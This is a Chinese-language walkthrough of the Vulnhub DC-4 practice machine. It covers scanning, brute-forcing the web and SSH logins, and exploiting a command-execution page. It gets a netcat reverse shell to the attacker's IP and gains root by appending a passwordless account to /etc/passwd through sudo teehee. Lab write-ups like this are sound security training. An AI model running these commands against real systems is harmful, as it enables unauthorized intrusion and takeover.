Vulnhub靶机:DC4

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:DC4(10.0.2.57)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.57

Vulnhub靶机:DC4_第1张图片

使用nmap端口扫描发现靶机开放端口:22、80

Vulnhub靶机:DC4_第2张图片

打开网站是一个登录页面,查看源码也没有发现隐藏信息

Vulnhub靶机:DC4_第3张图片

使用gobuster和dirsearch工具进行目录爆破,未发现什么有用的目录和文件

gobuster dir -u http://10.0.2.57/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirsearch -u http://10.0.2.57

Vulnhub靶机:DC4_第4张图片
Vulnhub靶机:DC4_第5张图片

三、漏洞利用

登录界面可以使用sqlmap跑一下看看有没有sql注入,但发现没有

只能进行暴力破解看看了,使用用户名admin,爆破密码

Vulnhub靶机:DC4_第6张图片

爆破得到密码:happy,登录网站

Vulnhub靶机:DC4_第7张图片

把网站各个功能点点击一下,发现命令执行ls -l

Vulnhub靶机:DC4_第8张图片
Vulnhub靶机:DC4_第9张图片

抓包修改命令为id,执行命令成功

Vulnhub靶机:DC4_第10张图片

使用nc反弹shell

which+nc   #查看是否存在nc
nc+-e+/bin/bash+10.0.2.15+4444

Vulnhub靶机:DC4_第11张图片
Vulnhub靶机:DC4_第12张图片

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

翻一翻靶机各个文件夹,在/home/jim/backups文件夹下发现old-passwords.bak文件,该文件是一个字典文件

Vulnhub靶机:DC4_第13张图片

使用该字典对jim用户的ssh进行暴力破解,得到密码:jibril04

Vulnhub靶机:DC4_第14张图片

使用ssh登录jim用户

Vulnhub靶机:DC4_第15张图片

运行命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现/home/jim/test.sh文件

Vulnhub靶机:DC4_第16张图片

查看该脚本的内容,利用不了

Vulnhub靶机:DC4_第17张图片

/var/www/html目录下还发现了jim的邮件信息,里面存在charles用户的密码:^xHhA&hvim0y

Vulnhub靶机:DC4_第18张图片

切换为charles用户,使用命令sudo -l查看该用户的sudo命令,发现可以无密码执行/usr/bin/teehee命令

在这里插入图片描述

查看teehee命令帮助信息

teehee --help

Vulnhub靶机:DC4_第19张图片

搜索利用方法:tee | GTFOBins

LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"

我们可以用teehee命令写一些信息到/etc/passwd文件里面,进行提权

echo "myroot::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

在这里插入图片描述

获取flag

Vulnhub靶机:DC4_第20张图片

参考链接:DC-4靶场实战详解-CSDN博客

你可能感兴趣的:(靶场,web安全)